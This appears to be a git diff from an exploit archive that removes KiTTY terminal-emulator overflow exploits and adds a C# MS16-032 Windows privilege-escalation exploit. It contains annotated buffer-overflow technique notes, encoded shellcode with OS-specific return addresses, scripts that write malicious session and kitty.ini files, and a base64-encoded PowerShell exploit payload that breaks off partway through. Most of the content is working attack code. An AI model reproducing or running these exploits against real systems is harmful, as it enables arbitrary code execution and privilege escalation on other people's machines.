-buffer += "NoRemoteResize\\0\\\r"
-buffer += "NoMouseReporting\\0\\\r"
-buffer += "NoApplicationCursors\\0\\\r"
-buffer += "NoApplicationKeys\\0\\\r"
-buffer += "LinuxFunctionKeys\\0\\\r"
-buffer += "RXVTHomeEnd\\0\\\r"
-buffer += "BackspaceIsDelete\\1\\\r"
-buffer += "PassiveTelnet\\0\\\r"
-buffer += "RFCEnviron\\0\\\r"
-buffer += "RemoteCommand\\\\\r"
-buffer += "PublicKeyFile\\\\\r"
-buffer += "SSH2DES\\0\\\r"
-buffer += "SshProt\\3\\\r"
-buffer += "SshNoShell\\0\\\r"
-buffer += "GSSCustom\\\\\r"
-buffer += "GSSLibs\\gssapi32,sspi,custom\\\r"
-buffer += "AuthGSSAPI\\1\\\r"
-buffer += "AuthKI\\1\\\r"
-buffer += "AuthTIS\\0\\\r"
-buffer += "SshBanner\\1\\\r"
-buffer += "SshNoAuth\\0\\\r"
-buffer += "RekeyBytes\\1G\\\r"
-buffer += "RekeyTime\\60\\\r"
-buffer += "KEX\\dh-gex-sha1,dh-group14-sha1,dh-group1-sha1,rsa,WARN\\\r"
-buffer += "Cipher\\aes,blowfish,3des,WARN,arcfour,des\\\r"
-buffer += "ChangeUsername\\0\\\r"
-buffer += "GssapiFwd\\0\\\r"
-buffer += "AgentFwd\\0\\\r"
-buffer += "TryAgent\\1\\\r"
-buffer += "Compression\\0\\\r"
-buffer += "NoPTY\\0\\\r"
-buffer += "LocalUserName\\\\\r"
-buffer += "UserNameFromEnvironment\\0\\\r"
-buffer += "UserName\\\\\r"
-buffer += "Environment\\\\\r"
-buffer += "ProxyTelnetCommand\\connect%20%25host%20%25port%5Cn\\\r"
-buffer += "ProxyPassword\\\\\r"
-buffer += "ProxyUsername\\\\\r"
-buffer += "ProxyPort\\80\\\r"
-buffer += "ProxyHost\\proxy\\\r"
-buffer += "ProxyMethod\\0\\\r"
-buffer += "ProxyLocalhost\\0\\\r"
-buffer += "ProxyDNS\\1\\\r"
-buffer += "ProxyExcludeList\\\\\r"
-buffer += "AddressFamily\\0\\\r"
-buffer += "TerminalModes\\CS7=A,CS8=A,DISCARD=A,DSUSP=A,ECHO=A,ECHOCTL=A,ECHOE=A,ECHOK=A,ECHOKE=A,ECHONL=A,EOF=A,EOL=A,EOL2=A,ERASE=A,FLUSH=A,ICANON=A,ICRNL=A,IEXTEN=A,IGNCR=A,IGNPAR=A,IMAXBEL=A,INLCR=A,INPCK=A,INTR=A,ISIG=A,ISTRIP=A,IUCLC=A,IXANY=A,IXOFF=A,IXON=A,KILL=A,LNEXT=A,NOFLSH=A,OCRNL=A,OLCUC=A,ONLCR=A,ONLRET=A,ONOCR=A,OPOST=A,PARENB=A,PARMRK=A,PARODD=A,PENDIN=A,QUIT=A,REPRINT=A,START=A,STATUS=A,STOP=A,SUSP=A,SWTCH=A,TOSTOP=A,WERASE=A,XCASE=A\\\r"
-buffer += "TerminalSpeed\\38400,38400\\\r"
-buffer += "TerminalType\\xterm\\\r"
-buffer += "TCPKeepalives\\0\\\r"
-buffer += "TCPNoDelay\\1\\\r"
-buffer += "PingIntervalSecs\\0\\\r"
-buffer += "PingInterval\\0\\\r"
-buffer += "WarnOnClose\\1\\\r"
-buffer += "CloseOnExit\\1\\\r"
-buffer += "PortNumber\\22\\\r"
-buffer += "Protocol\\ssh\\\r"
-buffer += "SSHLogOmitData\\0\\\r"
-buffer += "SSHLogOmitPasswords\\1\\\r"
-buffer += "LogFlush\\1\\\r"
-buffer += "LogFileClash\\-1\\\r"
-buffer += "LogType\\0\\\r"
-buffer += "LogFileName\\" + payload2 + "\\\r"	# Shellcode
-buffer += "HostName\\" + payload1 + "\\\r"		# Egg Hunter
-buffer += "Present\\1\\\r"
-buffer += "LogHost\\\\\r"
-
-# Location of our evil session file (modify with your KiTTY directory)
-file = "C:\\kitty\\App\\KiTTY\\Sessions\\EvilSession"
-try:
-	print "\n[*] Writing to %s (%s bytes)" % (file, len(buffer))
-	f = open(file,'w')
-	f.write(buffer)
-	f.close()
-	print "[*] Done!"
-except:
-    print "[-] Error writing %s" % file
\ No newline at end of file
diff --git a/platforms/windows/local/39122..py b/platforms/windows/local/39122..py
deleted file mode 100755
index bc167fb16..000000000
--- a/platforms/windows/local/39122..py
+++ /dev/null
@@ -1,263 +0,0 @@
-# Exploit Title: KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)
-# Date: 28/12/2015
-# Exploit Author: Guillaume Kaddouch
-# 	Twitter: @gkweb76
-#	Blog: http://networkfilter.blogspot.com 
-#	GitHub: https://github.com/gkweb76/exploits
-# Vendor Homepage: http://www.9bis.net/kitty/
-# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe
-# Version: 0.65.0.2p
-# Tested on: Windows 8.1 Pro x64 (FR), Windows 10 Pro x64 (FR)
-# Category: Local
-
-"""
-Disclosure Timeline:
---------------------
-2015-09-18: Vulnerability discovered
-2015-09-26: Vendor contacted
-2015-09-28: Vendor answer
-2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability
-2015-10-20: KiTTY 0.65.1.1p released, vendor fix, but app can still be crashed using same vulnerability on another kitty.ini parameter
-2015-11-15: KiTTY 0.66.6.1p released, seems fixed
-2015-12-28: exploit published
-
-Description :
--------------
-A local overflow exists in kitty.ini file used by KiTTY portable. By writing a 1048 bytes string into 
-the kitty.ini file, an overflow occurs that makes Kitty crashing. At time of the crash, EIP is 
-overwritten at offset 1036. As all DLLs are ALSR and DEP protected, and rebased, we can only use 
-kitty_portable.exe addresses, which start with a NULL. Successful exploitation will allow to execute
-local executables on Windows 8.1 and Windows 10.
-
-Win8.1 -> Code Execution
-Win10  -> Code Execution
-
-Instructions:
--------------
-- Run exploit
-- Launch KiTTY
-
-Exploitation:
--------------
-As EDX register points to our buffer, it seems like using a return address pointing to a 
-JMP EDX instruction would do the trick. However this is not the case, because of the address containing
-a NULL byte, our 1048 bytes buffer is truncated to 1039 bytes, and an access violation occurs before EIP could be
-overwritten:
-
-EAX = 00000041
-00533DA2     0000           ADD BYTE PTR DS:[EAX],AL <---- Access violation when writing to [EAX]
-00533DA4     00             DB 00
-
-Increasing our initial buffer by 4 bytes (1052 bytes) gives us another crash,
-but neither EIP nor SEH are overwritten. We end up with another memory access violation, which although looking
-like a deadend, is in fact exploitable:
-
-ECX and EBX points to our buffer
-EDX and EDI are overwritten by our buffer
-
-EDI = 41414141
-764F8DD2   8917             MOV DWORD PTR DS:[EDI],EDX <---- Access violation when writing to [EDI]
-
-Although we do not have control over the execution flow (EIP), we have at least control of the value written to EDI
-at offset 1048. We can write a valid memory address into EDI, allowing the program to continue 
-its execution. One such address is the address ESP points to on the stack: 0x0028C4F8.
-Let's take a closer look to the code executed:
-
-
-764F8DB8   BA FFFEFE7E      MOV EDX,7EFEFEFF			<-------- (3) JMP back here
-764F8DBD   8B01             MOV EAX,DWORD PTR DS:[ECX]
-764F8DBF   03D0             ADD EDX,EAX
-764F8DC1   83F0 FF          XOR EAX,FFFFFFFF
-764F8DC4   33C2             XOR EAX,EDX
-764F8DC6   8B11             MOV EDX,DWORD PTR DS:[ECX]
-764F8DC8   83C1 04          ADD ECX,4
-764F8DCB   A9 00010181      TEST EAX,81010100
-764F8DD0   75 07            JNZ SHORT msvcrt.764F8DD9
-
-764F8DD2   8917             MOV DWORD PTR DS:[EDI],EDX  <------- (1) We start HERE
-764F8DD4   83C7 04          ADD EDI,4
-764F8DD7   EB DF            JMP SHORT msvcrt.764F8DB8   <------- (2) jump back above
-
-1) Value from EDX is copied to the stack where EDI points to, then EDI is incremented and points to next address
-2) The execution jumps back at the beginning of the code block, overwrites our source register EDX with 7EFEFEFF,
-overwrites EAX with 41414141 (ECX point to our buffer), restore EDX with 41414141, increment ECX pointing to our
-buffer by 4, pointing to our next buffer value, and starting all over again. Also there is a very interesting instruction 
-following this code:
-
-764F8DD2   8917             MOV DWORD PTR DS:[EDI],EDX    <------- We are HERE
-764F8DD4   83C7 04          ADD EDI,4
-764F8DD7   EB DF            JMP SHORT msvcrt.764F8DB8
-764F8DD9   84D2             TEST DL,DL
-764F8DDB   74 32            JE SHORT msvcrt.764F8E0F
-764F8DDD   84F6             TEST DH,DH
-764F8DDF   74 15            JE SHORT msvcrt.764F8DF6
-764F8DE1   F7C2 0000FF00    TEST EDX,0FF0000
-764F8DE7   75 16            JNZ SHORT msvcrt.764F8DFF
-764F8DE9   66:8917          MOV WORD PTR DS:[EDI],DX
-764F8DEC   8B4424 08        MOV EAX,DWORD PTR SS:[ESP+8]
-764F8DF0   C647 02 00       MOV BYTE PTR DS:[EDI+2],0
-764F8DF4   5F               POP EDI
-764F8DF5   C3               RETN							<------- We want that!
-
-This code block happily copies our entire buffer chunk by chunk to the stack, and is later followed by a RET instruction.
-If there could be a way to copy our buffer on the stack and make ESP pointing to a predictable part or our buffer, the RET would
-give us the control of the execution flow.
-
-When the copy operation is finished, the code crashes again and this time EIP is overwritten with 41414141, and ESP
-has the address 0x0028C500 pointing toward the near begining of our buffer (offset 8). The RET has been reached, wonderful :-)
-
-However, we cannot write a usable address here to jump somewhere else as a NULL byte would truncate our entire buffer and no 
-crash would occur... The goal here would be to find the correct address to put into EDI so that ESP will point to the end
-of our buffer, where we will be able to use another address, containing a NULL, to jump somewhere else and
-take back control of the execution flow. However our buffer is already terminated by a NULL byte address for EDI.
-
-1) We cannot make ESP points anywhere in the middle of our buffer, as we can only use addresses containing a NULL
-2) We cannot add another valid NULL containing address at the end of our buffer, as a stack address containing a NULL is there 
-for EDI
-3) EDI contains an address already pointing to the start of our buffer, thanks to the copy operation, our only chance is to try
-to make ESP pointing to it when the crash happens.
-
-After testing by incrementing or decrementing EDI address value, it appears ESP always point to 0x0028C500 at time 
-of the crash. This means we can calculate the correct offset to align EDI address with ESP, just before the RET happens to make 
-EIP following that address. The EDI address to achieve that is: (EIP)0x0028C500 - (buffer length)1052 = 0x0028C0E4. 
-As our buffer is copied onto a NULLs filled zone, we can omit the NULL byte and set EDI to '\xE4\xC0\x28'.
-
-To sume it up:
-1) First crash with EIP overwritten seems not exploitable
-2) Second crash does not have EIP nor SEH overwritten (memory access violation), we only have "control" over some registers
-3) Tweaking values of EDX and EDI, makes the program continue execution and copying our buffer onto the stack
-4) The RET instruction is reached and execution crashes again
-5) We find an EDI address value which is valid for a) copying our buffer on stack, b) is aligning itself with ESP at the correct
-offset and c) will appear on the stack and be used by the RET instruction, giving us finally control over the execution flow.
-
-That is like being forbidden to enter a building, but we give two bags (EDI + EDX) to someone authorized who enters the building,
-who do all the work for us inside, and goes out back to us with the vault key (EIP).
-"""
-
-import sys
-
-if len(sys.argv) == 1:
-	print "\nUsage: kitty_ini_8_10.py <win8.1|win10>"
-	print "Example: kitty_ini_8_10.py win8.1"
-	sys.exit()
-
-os = sys.argv[1] # Windows version to target
-
-# Metasploit WinExec shellcode (calc.exe)
-# Encoder: x86/alpha_mixed
-# Bad chars: \x00\x0a\x0d\x21\x11\x1a\x01\x31
-# Size: 448 bytes
-shellcode = (
-"\x89\xe6\xdd\xc7\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
-"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
-"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
-"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
-"\x69\x6c\x39\x78\x6f\x72\x57\x70\x77\x70\x65\x50\x55\x30\x6c"
-"\x49\x39\x75\x66\x51\x4f\x30\x65\x34\x4e\x6b\x70\x50\x56\x50"
-"\x4c\x4b\x70\x52\x36\x6c\x6e\x6b\x50\x52\x76\x74\x4c\x4b\x74"
-"\x32\x64\x68\x76\x6f\x48\x37\x50\x4a\x77\x56\x55\x61\x69\x6f"
-"\x6c\x6c\x45\x6c\x33\x51\x33\x4c\x35\x52\x34\x6c\x61\x30\x6b"
-"\x71\x38\x4f\x34\x4d\x76\x61\x5a\x67\x4b\x52\x38\x72\x63\x62"
-"\x52\x77\x4e\x6b\x76\x32\x46\x70\x4e\x6b\x32\x6a\x47\x4c\x4e"
-"\x6b\x50\x4c\x54\x51\x52\x58\x38\x63\x70\x48\x35\x51\x58\x51"
-"\x30\x51\x6c\x4b\x61\x49\x57\x50\x37\x71\x5a\x73\x6c\x4b\x30"
-"\x49\x56\x78\x39\x73\x66\x5a\x52\x69\x6c\x4b\x57\x44\x6e\x6b"
-"\x57\x71\x6b\x66\x34\x71\x4b\x4f\x6e\x4c\x59\x51\x48\x4f\x64"
-"\x4d\x67\x71\x58\x47\x75\x68\x6b\x50\x72\x55\x68\x76\x74\x43"
-"\x43\x4d\x6c\x38\x45\x6b\x73\x4d\x61\x34\x44\x35\x4d\x34\x51"
-"\x48\x4e\x6b\x71\x48\x34\x64\x76\x61\x39\x43\x35\x36\x4e\x6b"
-"\x74\x4c\x62\x6b\x4e\x6b\x50\x58\x67\x6c\x47\x71\x4b\x63\x6e"
-"\x6b\x65\x54\x6c\x4b\x76\x61\x38\x50\x4c\x49\x37\x34\x75\x74"
-"\x37\x54\x73\x6b\x63\x6b\x71\x71\x53\x69\x52\x7a\x43\x61\x79"
-"\x6f\x59\x70\x51\x4f\x61\x4f\x32\x7a\x4c\x4b\x42\x32\x58\x6b"
-"\x4e\x6d\x61\x4d\x43\x5a\x36\x61\x6c\x4d\x4d\x55\x6c\x72\x47"
-"\x70\x67\x70\x77\x70\x42\x70\x32\x48\x45\x61\x4e\x6b\x70\x6f"
-"\x6e\x67\x4b\x4f\x59\x45\x4f\x4b\x4a\x50\x6e\x55\x39\x32\x30"
-"\x56\x30\x68\x4c\x66\x4c\x55\x6f\x4d\x4d\x4d\x49\x6f\x4e\x35"
-"\x55\x6c\x74\x46\x33\x4c\x64\x4a\x6b\x30\x6b\x4b\x4d\x30\x42"
-"\x55\x47\x75\x6f\x4b\x70\x47\x67\x63\x30\x72\x30\x6f\x53\x5a"
-"\x43\x30\x63\x63\x4b\x4f\x38\x55\x32\x43\x61\x71\x50\x6c\x42"
-"\x43\x34\x6e\x33\x55\x44\x38\x43\x55\x33\x30\x41\x41"
-)
-
-# Stack address where to copy our shellcode, with an offset of ESP - 1052
-if os == "win8.1":
-	edi 	= '\xD4\xC0\x28' # 0x0028C0D4 WIN8.1 Pro x64
-elif os == "win10":
-	edi 	= '\xD4\xC0\x29' # 0x0029C0D4 WIN10 Pro x64
-else:
-	print "Unknown OS chosen. Please choose 'win8.1' or 'win10'."
-	sys.exit()
-
-nops	= '\x90' * 8
-padding = '\x41' * (1048 - len(nops) - len(shellcode))
-
-payload = nops + shellcode + padding + edi
-
-# Kitty.ini configuration file
-buffer ="[ConfigBox]\n"
-buffer +="height=22\n"
-buffer +="filter=yes\n"
-buffer +="#default=yes\n"
-buffer +="#noexit=no\n"
-buffer +="[KiTTY]\n"
-buffer +="backgroundimage=no\n"
-buffer +="capslock=no\n"
-buffer +="conf=yes\n"
-buffer +="cygterm=yes\n"
-buffer +="icon=no\n"
-buffer +="#iconfile=\n"
-buffer +="#numberoficons=45\n"
-buffer +="paste=no\n"
-buffer +="print=yes\n"
-buffer +="scriptfilefilter=\n"
-buffer +="size=no\n"
-buffer +="shortcuts=yes\n"
-buffer +="mouseshortcuts=yes\n"
-buffer +="hyperlink=no\n"
-buffer +="transparency=no\n"
-buffer +="#configdir=\n"
-buffer +="#downloaddir=\n"
-buffer +="#uploaddir=\n"
-buffer +="remotedir=\n"
-buffer +="#PSCPPath=\n"
-buffer +="#PlinkPath=\n"
-buffer +="#WinSCPPath=\n"
-buffer +="#CtHelperPath=\n"
-buffer +="#antiidle== \k08\\\n"
-buffer +="#antiidledelay=60\n"
-buffer +="sshversion=\n"
-buffer +="#WinSCPProtocol=sftp\n"
-buffer +="#autostoresshkey=no\n"
-buffer +="#UserPassSSHNoSave=no\n"
-buffer +="KiClassName=" + payload + "\n"
-buffer +="#ReconnectDelay=5\n"
-buffer +="savemode=dir\n"
-buffer +="bcdelay=0\n"
-buffer +="commanddelay=5\n"
-buffer +="initdelay=2.0\n"
-buffer +="internaldelay=10\n"
-buffer +="slidedelay=0\n"
-buffer +="wintitle=yes\n"
-buffer +="zmodem=yes\n"
-buffer +="[Print]\n"
-buffer +="height=100\n"
-buffer +="maxline=60\n"
-buffer +="maxchar=85\n"
-buffer +="[Folder]\n"
-buffer +="[Launcher]\n"
-buffer +="reload=yes\n"
-buffer +="[Shortcuts]\n"
-buffer +="print={SHIFT}{F7}\n"
-buffer +="printall={F7}\n"
-
-# Kitty.ini file location (modify according to your installation path)
-file = "C:\\kitty\\App\\KiTTY\\kitty.ini"
-try:
-	print "[*] Writing to %s (%s bytes)" % (file, len(buffer))
-	f = open(file,'w')
-	f.write(buffer)
-	f.close()
-	print "[*] Done!"
-except:
-    print "[-] Error writing %s" % file
\ No newline at end of file
diff --git a/platforms/windows/local/39809..cs b/platforms/windows/local/39809..cs
new file mode 100755
index 000000000..4b2822c50
--- /dev/null
+++ b/platforms/windows/local/39809..cs
@@ -0,0 +1,51 @@
+# Exploit Title: Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)
+# Date: 2016-04-25 
+# Author: @fdiskyou
+# e-mail: rui at deniable.org
+# Original exploit: https://www.exploit-db.com/exploits/39719/
+# All credits go to @FuzzySec
+# C# version with @FuzzySec powershell code which does not rely on powershell.exe. Instead it runs from a powershell runspace environment (.NET). Helpful in security restricted environments with GPO, SRP, App Locker.
+# To compile MS16-032 you need to import this project within Microsoft Visual Studio or if you don't have access to a Visual Studio installation, you can compile with csc.exe. 
+# It uses the System.Management.Automation namespace, so make sure you have the System.Management.Automation.dll within your source path when compiling outside of Visual Studio.
+# CVE: 2016-0099
+
+using System;
+using System.IO;
+using System.Collections.Generic;
+using System.Collections.ObjectModel;
+using System.Text;
+using System.Threading.Tasks;
+using System.Management.Automation;
+using System.Management.Automation.Host;
+using System.Management.Automation.Runspaces;
+
+namespace MS16_032
+{
+    class Program
+    {
+        static void Main()
+        {
+            PowerShellExecutor t = new PowerShellExecutor();
+            t.ExecuteSynchronously();
+        }
+    }
+
+    class PowerShellExecutor
+    {
+        public static string PSInvoke_MS16_032 = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@"ZnVuY3Rpb24gSW52b2tlLU1TMTYtMDMyIHsNCjwjDQouU1lOT1BTSVMNCiAgICANCiAgICBQb3dlclNoZWxsIGltcGxlbWVudGF0aW9uIG9mIE1TMTYtMDMyLiBUaGUgZXhwbG9pdCB0YXJnZXRzIGFsbCB2dWxuZXJhYmxlDQogICAgb3BlcmF0aW5nIHN5c3RlbXMgdGhhdCBzdXBwb3J0IFBvd2VyU2hlbGwgdjIrLiBDcmVkaXQgZm9yIHRoZSBkaXNjb3Zlcnkgb2YNCiAgICB0aGUgYnVnIGFuZCB0aGUgbG9naWMgdG8gZXhwbG9pdCBpdCBnbyB0byBKYW1lcyBGb3JzaGF3IChAdGlyYW5pZGRvKS4NCiAgICANCiAgICBUYXJnZXRzOg0KICAgIA0KICAgICogV2luNy1XaW4xMCAmIDJrOC0yazEyIDw9PSAzMi82NCBiaXQhDQogICAgKiBUZXN0ZWQgb24geDMyIFdpbjcsIHg2NCBXaW44LCB4NjQgMmsxMlIyDQogICAgDQogICAgTm90ZXM6DQogICAgDQogICAgKiBJbiBvcmRlciBmb3IgdGhlIHJhY2UgY29uZGl0aW9uIHRvIHN1Y2NlZWQgdGhlIG1hY2hpbmUgbXVzdCBoYXZlIDIrIENQVQ0KICAgICAgY29yZXMuIElmIHRlc3RpbmcgaW4gYSBWTSBqdXN0IG1ha2Ugc3VyZSB0byBhZGQgYSBjb3JlIGlmIG5lZWRlZCBta2F5Lg0KICAgICogVGhlIGV4cGxvaXQgaXMgcHJldHR5IHJlbGlhYmxlLCBob3dldmVyIH4xLzYgdGltZXMgaXQgd2lsbCBzYXkgaXQgc3VjY2VlZGVkDQogICAgICBidXQgbm90IHNwYXduIGEgc2hlbGwuIE5vdCBzdXJlIHdoYXQgdGhlIGlzc3VlIGlzIGJ1dCBqdXN0IHJlLXJ1biBhbmQgcHJvZml0IQ0KICAgICogV2FudCB0byBrbm93IG1vcmUgYWJvdXQgTVMxNi0wMzIgPT0+DQogICAgICBodHRwczovL2dvb2dsZXByb2plY3R6ZXJvLmJsb2dzcG90LmNvLnVrLzIwMTYvMDMvZXhwbG9pdGluZy1sZWFrZWQtdGhyZWFkLWhhbmRsZS5odG1sDQoNCi5ERVNDUklQVElPTg0KCUF1dGhvcjogUnViZW4gQm9vbmVuIChARnV6enlTZWMpDQoJQmxvZzogaHR0cDovL3d3dy5mdXp6eXNlY3VyaXR5LmNvbS8NCglMaWNlbnNlOiBCU0QgMy1DbGF1c2UNCglSZXF1aXJlZCBEZXBlbmRlbmNpZXM6IFBvd2VyU2hlbGwgdjIrDQoJT3B0aW9uYWwgRGVwZW5kZW5jaWVzOiBOb25lDQogICAgDQouRVhBTVBMRQ0KCUM6XFBTPiBJbnZva2UtTVMxNi0wMzINCiM+DQoJQWRkLVR5cGUgLVR5cGVEZWZpbml0aW9uIEAiDQoJdXNpbmcgU3lzdGVtOw0KCXVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsNCgl1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7DQoJdXNpbmcgU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbDsNCgkNCglbU3RydWN0TGF5b3V0KExheW91dEtpbmQuU2VxdWVudGlhbCldDQoJcHVibGljIHN0cnVjdCBQUk9DRVNTX0lORk9STUFUSU9ODQoJew0KCQlwdWJsaWMgSW50UHRyIGhQcm9jZXNzOw0KCQlwdWJsaWMgSW50UHRyIGhUaHJlYWQ7DQoJCXB1YmxpYyBpbnQgZHdQcm9jZXNzSWQ7DQoJCXB1YmxpYyBpbnQgZHdUaHJlYWRJZDsNCgl9DQoJDQoJW1N0cnVjdExheW91dChMYXlvdXRLaW5kLlNlcXVlbnRpYWwsIENoYXJTZXQ9Q2hhclNldC5Vbmljb2RlKV0NCglwdWJsaWMgc3RydWN0IFNUQVJUVVBJTkZPDQoJew0KCQlwdWJsaWMgSW50MzIgY2I7DQoJCXB1YmxpYyBzdHJpbmcgbHBSZXNlcnZlZDsNCgkJcHVibGljIHN0cmluZyBscERlc2t0b3A7DQoJCXB1YmxpYyBzdHJpbmcgbHBUaXRsZTsNCgkJcHVibGljIEludDMyIGR3WDsNCgkJcHVibGljIEludDMyIGR3WTsNCgkJcHVibGljIEludDMyIGR3WFNpemU7DQoJCXB1YmxpYyBJbnQzMiBkd1lTaXplOw0KCQlwdWJsaWMgSW50MzIgZHdYQ291bnRDaGFyczsNCgkJcHVibGljIEludDMyIGR3WUNvdW50Q2hhcnM7DQoJCXB1YmxpYyBJbnQzMiBkd0ZpbGxBdHRyaWJ1dGU7DQoJCXB1YmxpYyBJbnQzMiBkd0ZsYWdzOw0KCQlwdWJsaWMgSW50MTYgd1Nob3dXaW5kb3c7DQoJCXB1YmxpYyBJbnQxNiBjYlJlc2VydmVkMjsNCgkJcHVibGljIEludFB0ciBscFJlc2VydmVkMjsNCgkJcHVibGljIEludFB0ciBoU3RkSW5wdXQ7DQoJCXB1YmxpYyBJbnRQdHIgaFN0ZE91dHB1dDsNCgkJcHVibGljIEludFB0ciBoU3RkRXJyb3I7DQoJfQ0KCQ0KCVtTdHJ1Y3RMYXlvdXQoTGF5b3V0S2luZC5TZXF1ZW50aWFsKV0NCglwdWJsaWMgc3RydWN0IFNRT1MNCgl7DQoJCXB1YmxpYyBpbnQgTGVuZ3RoOw0KCQlwdWJsaWMgaW50IEltcGVyc29uYXRpb25MZXZlbDsNCgkJcHVibGljIGludCBDb250ZXh0VHJhY2tpbmdNb2RlOw0KCQlwdWJsaWMgYm9vbCBFZmZlY3RpdmVPbmx5Ow0KCX0NCgkNCglwdWJsaWMgc3RhdGljIGNsYXNzIEFkdmFwaTMyDQoJew0KCQlbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSwgQ2hhclNldD1DaGFyU2V0LlVuaWNvZGUpXQ0KCQlwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIENyZWF0ZVByb2Nlc3NXaXRoTG9nb25XKA0KCQkJU3RyaW5nIHVzZXJOYW1lLA0KCQkJU3RyaW5nIGRvbWFpbiwNCgkJCVN0cmluZyBwYXNzd29yZCwNCgkJCWludCBsb2dvbkZsYWdzLA0KCQkJU3RyaW5nIGFwcGxpY2F0aW9uTmFtZSwNCgkJCVN0cmluZyBjb21tYW5kTGluZSwNCgkJCWludCBjcmVhdGlvbkZsYWdzLA0KCQkJaW50IGVudmlyb25tZW50LA0KCQkJU3RyaW5nIGN1cnJlbnREaXJlY3RvcnksDQoJCQlyZWYgIFNUQVJUVVBJTkZPIHN0YXJ0dXBJbmZvLA0KCQkJb3V0IFBST0NFU1NfSU5GT1JNQVRJT04gcHJvY2Vzc0luZm9ybWF0aW9uKTsNCgkJCQ0KCQlbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgU2V0VGhyZWFkVG9rZW4oDQoJCQlyZWYgSW50UHRyIFRocmVhZCwNCgkJCUludFB0ciBUb2tlbik7DQoJCQkNCgkJW0RsbEltcG9ydCgiYWR2YXBpMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQ0KCQlwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIE9wZW5UaHJlYWRUb2tlbigNCgkJCUludFB0ciBUaHJlYWRIYW5kbGUsDQoJCQlpbnQgRGVzaXJlZEFjY2VzcywNCgkJCWJvb2wgT3BlbkFzU2VsZiwNCgkJCW91dCBJbnRQdHIgVG9rZW5IYW5kbGUpOw0KCQkJDQoJCVtEbGxJbXBvcnQoImFkdmFwaTMyLmRsbCIsIFNldExhc3RFcnJvcj10cnVlKV0NCgkJcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBPcGVuUHJvY2Vzc1Rva2VuKA0KCQkJSW50UHRyIFByb2Nlc3NIYW5kbGUsIA0KCQkJaW50IERlc2lyZWRBY2Nlc3MsDQoJCQlyZWYgSW50UHRyIFRva2VuSGFuZGxlKTsNCgkJCQ0KCQlbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXB1YmxpYyBleHRlcm4gc3RhdGljIGJvb2wgRHVwbGljYXRlVG9rZW4oDQoJCQlJbnRQdHIgRXhpc3RpbmdUb2tlbkhhbmRsZSwNCgkJCWludCBTRUNVUklUWV9JTVBFUlNPTkFUSU9OX0xFVkVMLA0KCQkJcmVmIEludFB0ciBEdXBsaWNhdGVUb2tlbkhhbmRsZSk7DQoJfQ0KCQ0KCXB1YmxpYyBzdGF0aWMgY2xhc3MgS2VybmVsMzINCgl7DQoJCVtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXQ0KCQlwdWJsaWMgc3RhdGljIGV4dGVybiB1aW50IEdldExhc3RFcnJvcigpOw0KCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRDdXJyZW50UHJvY2VzcygpOw0KCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRDdXJyZW50VGhyZWFkKCk7DQoJCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBHZXRUaHJlYWRJZChJbnRQdHIgaFRocmVhZCk7DQoJCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0NCgkJcHVibGljIHN0YXRpYyBleHRlcm4gaW50IEdldFByb2Nlc3NJZE9mVGhyZWFkKEludFB0ciBoYW5kbGUpOw0KCQkNCgkJW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIixTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBTdXNwZW5kVGhyZWFkKEludFB0ciBoVGhyZWFkKTsNCgkJDQoJCVtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsU2V0TGFzdEVycm9yPXRydWUpXQ0KCQlwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgUmVzdW1lVGhyZWFkKEludFB0ciBoVGhyZWFkKTsNCgkJDQoJCVtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsIFNldExhc3RFcnJvcj10cnVlKV0NCgkJcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBUZXJtaW5hdGVQcm9jZXNzKA0KCQkJSW50UHRyIGhQcm9jZXNzLA0KCQkJdWludCB1RXhpdENvZGUpOw0KCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgQ